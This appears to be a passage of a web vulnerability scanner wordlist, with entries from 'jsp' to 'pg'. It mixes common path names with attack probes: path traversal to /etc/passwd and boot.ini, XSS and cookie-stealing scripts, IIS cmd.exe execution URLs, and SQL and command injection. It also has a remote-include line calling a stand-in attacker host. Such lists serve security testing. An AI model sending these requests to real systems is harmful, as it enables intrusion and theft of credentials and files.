jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini
jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd
jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd
jsps
jsptest.jsp+
jsr
jsso
js/swfupload/swfupload_f9.swf
js/swfupload/swfupload.swf
js/tiny_mce/
js/tinymce/
jsx
jump
juniper
junk
JUNK(10)
JUNK(10)abcd.html
JUNK(223)<font%20size=50>DEFACED<!--//--
JUNK(223)<font%20size=50><script>alert('Vulnerable')</script><!--//--
JUNK(5)/
JUNK(5).csp
JUNK(5).htw
JUNK(5).xml
JUNK(6).cfm?mode=debug
junk.aspx
jvm
k
katalog
kb
kbccv11.nsf
kbnv11.nsf
kboard
kboard/
kb_results
kbssvv11.nsf
kcaptcha
kcfinder/browse.php
.keep
keep
kept
kernel
kernel/class/delete.php
kernel/classes/ezrole.php
key
keygen
keys
keyword
keywords
k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor
kids
kill
killer.php
kiosk
known_hosts
ko
ko_KR
.komodotools
.komodotools/
kontakt
konto-eroeffnen
kr
krysalis/
kunden
l
L
l0gs.txt
L3b.php
la
lab
labels
labs
lander.logs
landing
landingpages
landwind
lang
lang-en
lang-fr
langs
language
languages
laptops
large
lastnews
lastpost
last.sql
lat_account
lat_driver
latest
lat_getlinking
lat_signin
lat_signout
lat_signup
launch
launch.asp?NFuse_Application=LookOut&NFuse_MIMEExtension=.ica
launch.asp?NFuse_Application=<script>alert('Vulnerable')</script>
launcher
launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script>
launchpage
law
layout
_layouts
layouts
_layouts/alllibs.htm
_layouts/settings.htm
_layouts/userinfo.htm
lccon.nsf
lcgi/lcgitest.nlm
lcgi/ndsobj.nlm
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf
lcgi/sys:/novonyx/suitespot/docs/sewse/misc/test.jse
lcon.nsf
ldap
ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\"Vulnerable\")</script>
ldap.nsf
ldap.search.php3?ldap_serv=nonsense%20
l_domlog.nsf
leader
leaders
leads
learn
learners
learning
left
legacy
legal
Legal
legal-notice
legislation
leiadm.nsf
leilog.nsf
leivlt.nsf
lenya
.lesshst
lessons
letters
level
level/16
level/16/exec/
level/16/exec/-///pwd
level/16/exec//show
level/16/exec//show/access-lists
level/16/exec/-///show/configuration
level/16/level/16/exec//show/configuration
level/16/level/16/exec//show/interfaces
level/16/level/16/exec//show/interfaces/status
level/16/level/16/exec//show/running-config/interface/FastEthernet
level/16/level/16/exec//show/version
level/17/exec//show
level/18/exec//show
level/19/exec//show
level/20/exec//show
level/21/exec//show
level/22/exec//show
level/23/exec//show
level/24/exec//show
level/25/exec//show
level/26/exec//show
level/27/exec//show
level/28/exec//show
level/29/exec//show
level/30/exec//show
level/31/exec//show
level/32/exec//show
level/33/exec//show
level/34/exec//show
level/35/exec//show
level/36/exec//show
level/37/exec//show
level/38/exec//show
level/39/exec//show
level/40/exec//show
level/41/exec//show
level/42/exec//show
level/42/exec/show%20conf
level/43/exec//show
level/44/exec//show
level/45/exec//show
level/46/exec//show
level/47/exec//show
level/48/exec//show
level/49/exec//show
level/50/exec//show
level/51/exec//show
level/52/exec//show
level/53/exec//show
level/54/exec//show
level/55/exec//show
level/56/exec//show
level/57/exec//show
level/58/exec//show
level/59/exec//show
level/60/exec//show
level/61/exec//show
level/62/exec//show
level/63/exec//show
level/64/exec//show
level/65/exec//show
level/66/exec//show
level/67/exec//show
level/68/exec//show
level/69/exec//show
level/70/exec//show
level/71/exec//show
level/72/exec//show
level/73/exec//show
level/74/exec//show
level/75/exec//show
level/76/exec//show
level/77/exec//show
level/78/exec//show
level/79/exec//show
level/80/exec//show
level/81/exec//show
level/82/exec//show
level/83/exec//show
level/84/exec//show
level/85/exec//show
level/86/exec//show
level/87/exec//show
level/88/exec//show
level/89/exec//show
level/90/exec//show
level/91/exec//show
level/92/exec//show
level/93/exec//show
level/94/exec//show
level/95/exec//show
level/96/exec//show
level/97/exec//show
level/98/exec//show
level/99/exec//show
lg
lgpl
_lib
lib
lib/
lib/fckeditor/
lib/fileupload/fileBrowser.php
lib/flex/uploader/.actionScriptProperties
lib/flex/uploader/.flexProperties
lib/flex/uploader/.project
lib/flex/uploader/.settings
lib/flex/varien/.actionScriptProperties
lib/flex/varien/.flexLibProperties
lib/flex/varien/.project
lib/flex/varien/.settings
librairies
libraries
libraries/phpmailer/
libraries/tiny_mce/
libraries/tinymce/
library
library/
libro/
libs
lib/spaw2/dialogs/dialog.php
libs/spaw2/dialogs/dialog.php
libs/spaw/dialogs/dialog.php
lib/tiny_mce/
lib/tinymce/
lic
licence
license
LICENSE
license_afl
licenses
license.txt
LICENSE.txt
licensing
life
lifestyle
lightbox
.lighttpd.conf
lilo.conf
limit
line
link
linkex
linkhub/linkhub.log
linkmachine
links
Links
links_submit
link-to-us
linktous
linktous.html
linusadmin-phpinfo.php
linux
linux/
Linux
lisence
lisense
list
listadmin
list-create
list-edit
list_emails
listinfo
.listing
listing
.listings
listings
lists
lists/admin/
lists/config
list-search
list-users
list_users
listusers
list-view
listview
live
livechat
livehelp
livehelp/
LiveHelp/
livesupport
livezilla
livredor/index.php
lo
load
loader
loading
.loadpath
load.php
loc
.local
local
.LOCAL
local_bd_new.txt
local_bd_old.txt
local/composer.lock
local/composer.phar
local.config.rb
locale
.localeapp/
local/.gitignore
local/.git/index
localhost.old
localhost.rar
localhost.rdb
localhost.sql
localhost.sqlite
localhost.tag.gz
localhost.tar
localhost.tar.bz2
localhost.tar.gz
localhost.tgz
localhost.zipu
local/httpd$map.conf
local.properties
localsettings.php~
localsettings.php.bak
localsettings.php.dist
localsettings.php.old
localsettings.php.save
.localsettings.php.swp
localsettings.php.swp
localsettings.php.templ
localsettings.php.txt
localstart
localstart.asp
local.xml.additional
local.xml.template
location
locations
locator
lock
locked
lockout
.lock-wscript
lofiversion
.log
_log/
~log
log
log/
Log
log_1.txt
log4a.nsf
log4j
log4net
_log/access-log
_log/access.log
_log/access_log
log/access.log
log/access_log
logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|
log/development.log
_log/error-log
_log/error.log
_log/error_log
log/error.log
log/error_log
log_errors.txt
logexpcus.txt
logfile
logfile/
logfile.htm
logfile.html
logfiles
logfiles/
LogFiles
logfile.txt
logfileview
logger
logger/
logger.html
logging
logging/
log.htm
log.html
logicworks.ini
.login
login
login/
Login
login1
loginadmin
.login_conf
login_db
loginflat
login.jsp
login.php
login.php3?reason=chpass2%20
login.php?sess=your_session_id&abt=&new_lang=99999&caller=navlang
LOGIN.PWD
login-redirect
logins
login_sendpass
logins.html
login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>
login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>
logins.txt
login-us
logjam/showhits.php
log/log.log
log/log.txt
log.mdb
log.nsf
logo
logoff
logon
logos
logo_sysadmin
logout
log.php
log/production.log
_logs
_logs/
~logs
logs
logs/
Logs
_logs/access-log
_logs/access.log
_logs/access_log
logs/access.log
logs/access_log
logs_console/
_logs/error-log
_logs/error.log
_logs/error_log
logs/error.log
logs/error_log
logs/errors
log/server.log
logs.htm
logs.html
logs.mdb
log.sqlite
logs/sendmail
logs.sqlite
logs/str_err.log
log_status_order.txt
logs.txt
log/test.log
log.txt
logview
loja
lol.php
lost
lost+found
lost+found/
lostpassword
Lotus_Domino_Admin
love
low
~lp
lp
lpt1
lpt2
lpt9
lpt9.xtp
ls
.LSOverride
lst
lsxlc.nsf
lt
lucene
lunch_menu
lv
.lynx_cookies
m
M
m1
m6
m6_edit_item
m6_invoice
m6_pay
m7
__ma/
ma
ma/
mab.nsf
mac
macadmin
__MACOSX
macromedia
madspot.php
madspotshell.php
maestro
magazin
magazine
magazines
magento
.magentointel-cache/
magic
magmi/conf/magmi.ini
magnifier_xml
magpierss
~mail
mail
mail/
mail10.box
mail1.box
mail2.box
mail3.box
mail4.box
mail5.box
mail6.box
mail7.box
mail8.box
mail9.box
mail/addressaction.html?id=<USERID#>&newaddress=1&addressname=<script>alert('Vulnerable')</script>&[email protected]
mail/adminisist.nsf
.mail_aliases
mail.box
mailbox
mailer
mail/include.html
mailing
mailinglist
mailings
mail_link
maillist
mailman
mailman/admin/ml-name?\"><script>alert('Vulnerable')</script>;
mailman/listinfo
mailman/listinfo/<script>alert('Vulnerable')</script>
mailman/options/yourlist?language=en&email=&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;
mail_password
.mailrc
mails
mail/settings.html
mail/src/read_body.php
mailtemplates
mailto
mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=../../../../../../etc/passwd
mailw46.nsf
main
Main
mainfile
main.mdb
Main_Page
main_page.php
maint
maintainers
MAINTAINERS.txt
mainten
.maintenance
maintenance
maintenance/
.maintenance2
maintenance.flag
maintenance.flag2
maintenance.flag.bak
maintenance.php
maintenance/test2.php
maintenance/test.php
makefile
Makefile
mal
mall
mall_log_files/order.log
mambo
mambo/administrator/phpinfo.php
mambo/banners.php
mambo/index.php?Itemid=JUNK(5)
mambots
man
mana
manage
manage/cgi/cgiproc
managed
manage/login.asp+
management
manage.py
manager
manager/
manager/html
manager/html-manager-howto.html
manager/manager-howto.html
manifest
manifest.mf
MANIFEST.MF
mantis
mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F
manual
manual/
manual/ag/esperfrm.htm
manual/images/
manuallogin
manual.php
manuals
manual/servlets/scripts/servlet1/servform.htm
manual/servlets/scripts/shoes/shoeform.htm
manufacturer
manufacturers
map
maps
mark
market
market/
marketing
marketing/
marketplace
markets
master
masterpages
master.passwd
master.password
master/portquotes_new/admin.log
masters
masthead
match
matches
math
matrix
matt
maven
mb
mbo
mbox
.mc
.mc/
mc
mcartfree/database/metacart.mdb
mchat
mc-icons/
mcp
mdb
mdb-database
me
_media
media
Media
media_center
media/export-criteo.xml
mediakit
mediaplayer
medias
mediawiki
medium
meetings
megabook/admin.cgi?login=<script>alert('Vulnerable')</script>
megabook/files/20/setup.db
mein-konto
mein-merkzettel
mem
member
member2
memberlist
members
members/
Members
members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22
members.csv
membership
members/ID.pm
members/ID.xbb
members.log
members.mdb
membersonly
members.sql
members.sql.gz
members.sqlite
members.txt
members.xls
_mem_bin
_mem_bin/
_mem_bin/auoconfig.asp
_mem_bin/FormsLogin.asp
_mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script>
_mem_bin/remind.asp
membre
membres
memcached
memcp
.memdump
Mem/dynaform/FileExplorer.htm
Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000
memlogin
memo
memoria
memory
menu
menus
Menus
merchant
merchant2
mercurial.ini
.mergesources.yml
message
message/
messageboard
messages
messaging
messaging/
.meta
meta
metabase
metacart/database/metacart.mdb
.metadata
.metadata/
metadata
metaframe
meta-inf
META-INF
META-INF/context.xml
meta_login
meta_tags
metatags
mgr
michael
microsoft
midi
midicart.mdb
MIDICART/midicart.mdb
migrate
migrated
migrate.nsf
migration
military
m_images
min
mina
mine
mini
mini_cal
minicart
minimum
ministats/admin.cgi
mint
minute
mirror
mirrors
misc
misc/
Misc
miscellaneous
missing
mission
mix
mk
mkstats
mkstats/
ml
mlist
mlog.html
mlog.phtml
_mm
mm
mm5
mms
_mmserverscripts
_mmServerScripts/MMHTTPDB.asp
_mmServerScripts/MMHTTPDB.php
mmwip
mo
moadmin.php
mobi
mobil
mobile
mock
mod
modcp
mode
model
models
modelsearch
modem
moderation
moderator
moderator/
moderator.php
.modgit/
modif/delete.php
modif/ident.php
modif_infos.asp?n=%60/etc/passwd%60
modif_infos.asp?n=/....../boot.ini
modif_infos.asp?n=/.../.../.../.../.../.../boot.ini
modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini
modif_infos.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
modif_infos.asp?n=c:\boot.ini
modif_infos.asp?n=....//....//....//....//....//....//....//etc.passwd
modif_infos.asp?n=/../../../../../../../../../etc/passwd
modif_infos.asp?n=/etc/passwd
modif_infos.asp?n=../../../../../../../../../etc/passwd%00
modif_infos.asp?n=/etc/passwd%00
modify
modlogan
.modman
.modman/
mod_ose_docs
mod.php
mods
mods/apage/apage.cgi?f=file.htm.|id|
modsecurity.php
module
.modules
modules
modules/Downloads/voteinclude.php+
modules/Forums/attachment.php
modules/Forums/bb_smilies.php?bgcolor1=\"><script>alert('Vulnerable')</script>
modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script>
modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script>
modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script>
modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index
modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script>
modules.php?name=Downloads&d_op=viewdownload
modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script>
modules.php?name=Members_List&letter='%20OR%20pass%20LIKE%20'a%25'/*
modules.php?name=Members_List&sql_debug=1
modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script>
modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test
modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script>
modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script>
modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>
modules.php?op=modload&name=0&file=0
modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|
modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0
modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script+>
modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>;
modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=
modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink
modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2
modules/php/php.info
modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd
modules/Search/index.php
modules/spaw2/dialogs/dialog.php
modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>
modules/WebChat/in.php+
modules/WebChat/out.php
modules/WebChat/quit.php
modules/WebChat/users.php
modules/Your_Account/navbar.php+
modulos
mojo
money
monitor
monitoring
monitors
month
monthly
moodle
more
moregroupware/modules/webmail2/inc/
motd
moto1
moto-news
mount
move
moved
movie
movies
movimientos/
moving.page
mozilla
mp
mp3
mp3/
mp3s
mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb
mqseries
mqseries/
.mr.developer.cfg
mrtg
mrtg.cfg
ms
msadc
msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c
msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
msadc/msadcs.dll
msadc/samples/adctest.asp
msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found
msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini
msadm
msadm/domain/index.php3?account_name=\"><script>alert('Vulnerable')</script>
msadm/site/index.php3?authid=\"><script>alert('Vulnerable')</script>
msadm/user/login.php3?account_name=\"><script>alert('Vulnerable')</script>
msdwda.nsf
msft
msg
.msi
msie
msn
msoffice
mspace
mspress30/
msql
msql/
ms-sql
mssql
mssql/
mstpre
msword/
Msword/
MSword/
mt
mta
mtatbls.nsf
mt-bin
mt-check.cgi
mtdata/mtstore.nsf
mt-search
mt-static
mtstore.nsf
multi
multimedia
muracms.esproj
music
Music
musicqueue.cgi
mw-config/
.mweval_history
MWS/HandleSearch.html?searchTarget=test&B1=Submit
.mwsql_history
mx
my
my-account
myaccount
myadm/
myadmin
myadmin/
MyAdmin/
myadmin/index.php
myadmin/scripts/setup.php
mybackup/
myblog
mycalendar
mycgi
my-components
myfaces
_mygallery
my-gift-registry
myguestBk/add1.asp?|-|0|404_Object_Not_Found
myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found
myguestBk/admin/index.asp?|-|0|404_Object_Not_Found
myhome.php?action=messages&box=<script>alert('Vulnerable')</script>
myhomework
myicons
myinvoicer/config.inc
mylog.html?screen=/etc/passwd
mylog.phtml?screen=/etc/passwd
mypage
myphpnuke
myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent
myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=
myspace
my-sql
mysql
mysql/
mysql.7z
mysql-admin/
mysqladmin/
mysql/adminer.php
mysqladmin/scripts/setup.php
mysql_backups/
mysql.bz2
mysqld
mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
mysql_debug.sql
mysqldumper
mysqldumper/
mysql.err
mysql.gz
.mysql_history
mysqlitedb.db
mysql.log
mysqlmanager
mysqlmanager/
mysql.php
mysql.rar
mysql/scripts/setup.php
mysql.sql
mysql.sql.7z
mysql.sql.bz2
mysql.sql.gz
mysql.sql.rar
mysql.sql.tar
mysql.sql.tar.bz2
mysql.sql.tar.bzip2
mysql.sql.tar.gz
mysql.sql.tar.gzip
mysql.sql.tgz
mysql.sql.zip
mysql.tar
mysql.tar.bz2
mysql.tar.bzip2
mysql.tar.gz
mysql.tar.gzip
mysql.tgz
mysql.zip
mytag_js
mytp
my-wishlist
n
N
na_admin/
na_admin/ataglance.html
nachrichten
nagios
name
names
names.nsf
nano.save
national
nav
nav/cList.php?root=</script><script>alert('Vulnerable')/<script>
navigation
navsiteadmin
navSiteAdmin
nbactions.xml
nb-configuration.xml
.nbproject/
nbproject/
nbproject/private/private.properties
nbproject/private/private.xml
nbproject/project.properties
nbproject/project.xml
nc
ncl_items.html
ncl_items.shtml?SUBJECT=1
ne
_net
net
netbasic/websinfo.bas
netbsd
netcat
NetDetector/middle_help_intro.htm
NetDynamic/
NetDynamics/
netget?sid=Safety&amp;msg=2002&amp;file=Safety
netget?sid=user&msg=300&file=../../../../../../../../../boot.ini
netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd
nethome
nethome/
.netrc
.netrwhist
nets
netscape
netscape/
netstat
netstorage
netutils/findata.stm?host=<script>alert(document.cookie)</script>
netutils/findata.stm?user=<script>alert(document.cookie)</script>
netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script>
netutils/whodata.stm?sitename=<script>alert(document.cookie)</script>
network
networking
new
new/
New%20Folder
New%20folder%20(2)
newadmin
newattachment
new.php
newposts
newreply
news
News
newsadmin
news_insert
newsite
newsletter
newsletters
newsline
news/news.mdb
newsroom
newssys
newstarter
newthread
newticket
newtopic.php
newuser?Image=../../database/rbsserv.mdb
next
nfs
nginx-access.log
nginx.conf
nginx-error.log
nginx-ssl.access.log
nginx-ssl.error.log
nginx-status/
nginx_status
nice
nieuws
nikto.ida
ningbar
nk9
nl
nl/
nntp/nd000000.nsf
nntp/nd000001.nsf
nntp/nd000002.nsf
nntp/nd000003.nsf
nntp/nd000004.nsf
nntppost.nsf
no
~nobody
nobody
~nobody/etc/passwd
node
.nodelete
node/view/666\"><script>alert(document.domain)</script>
nohup.out
no-index
noindex
nokia
none
nosuchurl/><script>alert('Vulnerable')</script>
note
_notes
notes
_notes/dwsync.xml
notes.nsf
notfound
noticias
noticias/
notification
notifications
notified
notifier
notify
novell
_novo/composer.lock
nphp/nphpd.php
nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0
nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0
npm-debug.log
.npmignore
.npmrc
npn_admn.nsf
npn_rn.nsf
nr
ns
.nsconfig
nsf
.nsf/../winnt/win.ini
ns-icons/
nsn/..%5Cutil/attrib.bas
nsn/..%5Cutil/chkvol.bas
nsn/..%5Cutil/copy.bas
nsn/..%5Cutil/del.bas
nsn/..%5Cutil/dir.bas
nsn/..%5Cutil/dsbrowse.bas
nsn/..%5Cutil/glist.bas
nsn/..%5Cutil/lancard.bas
nsn/..%5Cutil/md.bas
nsn/..%5Cutil/rd.bas
nsn/..%5Cutil/ren.bas
nsn/..%5Cutil/send.bas
nsn/..%5Cutil/set.bas
nsn/..%5Cutil/slist.bas
nsn/..%5Cutil/type.bas
nsn/..%5Cutil/userlist.bas
nsn/..%5Cwebdemo/env.bas
nsn/..%5Cwebdemo/fdir.bas
nsn/..%5Cweb/env.bas
nsn/..%5Cweb/fdir.bas
nsn/env.bas
nsn/fdir.bas
nsn/fdir.bas:ShowVolume
nst.php
nstview.php
ntopic
ntsync45.nsf
ntsync4.nsf
nude
nuke
NUKEbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
NUKEbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
NUKEviewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
nul
nul..cfm
nul.cfm
nul..dbm
nul.dbm
null
null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
NULL.printer
number
nxfeed
nz
o
O
OA
OAErrorDetailPage
OA_HTML
OA_HTML/
OA_HTML/jsp/
OA_HTML/jsp/fnd/fndhelp.jsp?dbc=/u01/oracle/prodappl/fnd/11.5.0/secure/dbprod2_prod.dbc
OA_HTML/jsp/fnd/fndhelputil.jsp
OA_HTML/jsp/fnd/fndversion.jsp
OA_HTML/jsp/por/services/login.jsp
OA_HTML/jsp/wf/WFReassign.jsp
OA_HTML/META-INF/
OA_HTML/oam/
OA_HTML/oam/weboam.log
OA_HTML/PTB/ECXOTAPing.htm
OA_HTML/PTB/ICXINDEXBASECASE.htm
OA_HTML/PTB/mwa_readme.htm
OA_HTML/PTB/xml_sample1.htm
OA_HTML/webtools/doc/index.html
OA_JAVA/
OA_JAVA/Oracle/
OA_JAVA/oracle/forms/registry/Registry.dat
OA_JAVA/servlet.zip
OA_MEDIA/
OasDefault
oa_servlets
oauth
obdc
obj
object
objects
obsolete
obsoleted
oc/Search/sqlqhit.asp
oc/Search/SQLQHit.asp
odbc
odbc/
ode
oekaki/
oem
oem_webstage/cgi-bin/oemapp_cgi
oem_webstage/oem.conf
of
ofbiz
off
offer
offerdetail
offers
office
Office
offices
officescan/cgi/cgiChkMasterPwd.exe
officescan/cgi/jdkRqNotify.exe
officescan/hotdownload/ofscan.ini
offline
ogl
ojspdemos/basic/hellouser/hellouser.jsp
ojspdemos/basic/simple/usebean.jsp
ojspdemos/basic/simple/welcomeuser.jsp
.old
_old
old
old/
old_files
oldfiles
old.htaccess
old.htpasswd
oldie
old-site
old_site
old_site/
oldsite
.oldsnippets
.oldstatic
omited
on
onbound
online
onsite
op
open
open?
open-account
openads
openapp
openautoclassifieds/friendmail.php?listing=&lt;script&gt;alert(document.domain);&lt;/script&gt;
openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>
openbsd
opencart
opendir
opendir.php?/etc/passwd
opendir.php?requesturl=/etc/passwd
openejb
openfile
OpenFile.aspx?file=../../../../../../../../../../boot.ini
openjpa
opensearch
opensource
OpenTopic
openvpnadmin
openx
opera
operations
~operator
operator
opinion
opinions
opml
oprocmgr-status
opros
opt
option
options
options.inc.php+
options.php?optpage=<script>alert('Vulnerable!')</script>
ora
oracle
oradata
oradata/
order
order/
order_add_log.txt
order-detail
orderdownloads
ordered
orderfinished
order-follow
order-history
order_history
order.log
order_log
order-opc
order/order_log.dat
order/order_log_v12.dat
order-return
orders
orders/
orders/checks.txt
orders.csv
order-slip
orders.log
orders_log
orders/mountain.cfg
orders/order_log.dat
Orders/order_log.dat
orders/order_log_v12.dat
Orders/order_log_v12.dat
orders/orders.log
orders/orders.txt
orders.sql
orders.sql.gz
order_status
orderstatus
orders.txt
orders.xls
ordertotal
order.txt
org
organisation
organisations
organizations
.org-id-locations
orig
original
os
osc
oscommerce
oscommerce/default.php
ospfd.conf
.ost
other
others
otrs
out
outcome
outgoing
outgoing/
outils
outline
output
output-build.txt
outreach
_overlay
oversikt
overview
owa
owa_util%2esignature
owl
owners
ows
ows/
ows-bin
ows-bin/oaskill.exe?abcde.exe
ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah
ows-bin/perlidlc.bat?&dir
ows/restricted%2eshow
p
P
p2p
p7pm
pa
pack
package
packaged
package.json
packages
packaging
packed
pad
pafiledb/includes/team/file.php
page
page_1
page1
Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script>
page_2
page2
page.cgi?../../../../../../../../../../etc/passwd
pageid
page-not-found
pagenotfound
pager
_pages
pages
pages/
Pages
Pages/
page_sample1
_pages/_demo/
_pages/_demo/_sql/
pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
_pages/_webapp/_admin/_showjavartdetails.java
_pages/_webapp/_admin/_showpooldetails.java
_pages/_webapp/_jsp/
pagination
paid
paiement
painel/config/config.php.example
pam
panel
panel/
panelc
panel.php
paper
papers
parse
parse_xml.cgi
part
partenaires
partner
partners
parts
party
pass
pass.dat
pass_done.php
passes
passes.txt
passive
passlist
passlist.txt
passport
pass.txt
passw
.passwd
passwd
passwd.adjunct
passwd.bak
passwdfile
passwd.txt
passwor
password
password/
Password
password.html
password.inc
password.log
password.log‎
password.mdb
passwords
passwords/
passwords.html
passwords.mdb
password.sqlite
passwords.sqlite
passwords.txt
password.txt
past
patch
.patches/
patches
patents
path
path/nw/article.php?id='
pay
payment
payment_gateway
payments
paypal
paypalcancel
paypal_notify
paypalok
pbc_download
pbcs
pbcsad
pbcsi
pbmadmin/
pbo
pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
pbserver/pbserver.dll
pc
pccsmysqladm/incs/dbconnect.inc
pci
pconf
pd
pda
pdf
pdf/
PDF
pdf-invoice
pdf-order-slip
pdfs
PDG_Cart/
PDG_Cart/oder.log
PDG_Cart/shopper.conf
pear
peek
peel
pem
pending
people
People
people.list
.perf
perf
performance
perl
perl/
perl5
perl5/
perl5/files.pl
perl/-e%20%22system('cat%20/etc/passwd');\%22
perl/-e%20print%20Hello
perl/env.pl
perl/files.pl
perl/printenv
perl/samples/env.pl
perl/samples/lancgi.pl
perl/samples/ndslogin.pl
perl/samples/volscgi.pl
perl-status
person
personal
personal.mdb
personals
personal.sqlite
perweb.nsf
pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&[email protected]&pwd=test&pwd2=test&filled=1
pfx
pg
